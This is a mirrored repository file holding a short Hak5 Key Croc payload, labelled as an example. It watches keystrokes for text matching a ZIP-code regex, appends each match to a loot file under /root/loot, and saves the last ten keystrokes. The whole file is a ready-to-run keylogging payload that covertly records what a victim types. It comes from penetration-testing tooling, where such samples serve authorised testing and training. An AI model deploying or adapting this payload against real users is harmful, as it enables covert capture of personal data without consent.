mirror of
https://github.com/hak5/keycroc-payloads.git
synced 2026-04-02 08:24:29 +01:00
11 lines
273 B
Plaintext
11 lines
273 B
Plaintext
# Title: ZIP Code Logger
|
|
# Description: MATCH Regex example to capture ZIP codes
|
|
# Author: Hak5
|
|
# Version: 1.0
|
|
# Category: Example
|
|
#
|
|
#
|
|
MATCH [0-9]{5}(?:-[0-9]{4})?
|
|
echo $LOOT >> /root/loot/zip-codes.txt
|
|
SAVEKEYS /root/loot/zip-codes.txt LAST 10
|